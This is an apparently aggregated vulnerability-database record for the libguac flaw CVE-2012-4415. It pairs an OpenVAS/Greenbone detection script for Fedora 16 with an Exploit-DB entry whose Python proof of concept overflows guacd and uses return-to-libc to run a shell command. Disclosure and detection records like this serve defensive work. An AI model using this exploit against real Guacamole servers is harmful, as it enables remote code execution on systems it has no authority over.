(c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-September/088271.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864748\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-27 09:05:39 +0530 (Thu, 27 Sep 2012)\");\n script_cve_id(\"CVE-2012-4415\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-14097\");\n script_name(\"Fedora Update for libguac FEDORA-2012-14097\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libguac'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"libguac on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"libguac\", rpm:\"libguac~0.6.3~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-04T06:34:43", "bulletinFamily": "exploit", "description": "libguac Remote Buffer Overflow Vulnerability. CVE-2012-4415. Remote exploit for linux platform", "modified": "2012-09-11T00:00:00", "published": "2012-09-11T00:00:00", "id": "EDB-ID:37788", "href": "https://www.exploit-db.com/exploits/37788/", "type": "exploitdb", "title": "libguac Remote Buffer Overflow Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/55497/info\r\n\r\nlibguac is prone to a remote buffer-overflow vulnerability.\r\n\r\nAttackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in denial-of-service conditions. \r\n\r\n#!/usr/bin/python\r\n# CVE-2012-4415: PoC for guacd buffer overflow vulnerability # # Copyright (c) 2012 Timo Juhani Lindfors <timo.lindfors@iki.fi> # # Allows arbitrary code execution on Debian i386 guacd 0.6.0-1 with # default configuration. Uses return-to-libc to bypass non-executable # stack.\r\n#\r\nimport socket, struct\r\nPROTOCOL_ADDRESS = 0xbf807e9f\r\nSYSTEM_ADDRESS = 0xb76e7640\r\nclass GuacdPOC:\r\n def __init__(self, command):\r\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n self.sock.connect(('localhost', 4822))\r\n self.s(\"select\")\r\n self.c(\",\")\r\n protocol = (command + \"; \" + \"#\" * 265)[:265]\r\n protocol += struct.pack(\"L\", PROTOCOL_ADDRESS)\r\n protocol += struct.pack(\"L\", SYSTEM_ADDRESS)\r\n self.s(protocol)\r\n self.c(\";\")\r\n def s(self, x):\r\n self.sock.send(\"%d.%s\" % (len(x), x))\r\n def c(self, x):\r\n self.sock.send(x)\r\nGuacdPOC(\"touch /tmp/owned\")\r\n\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/37788/"}]}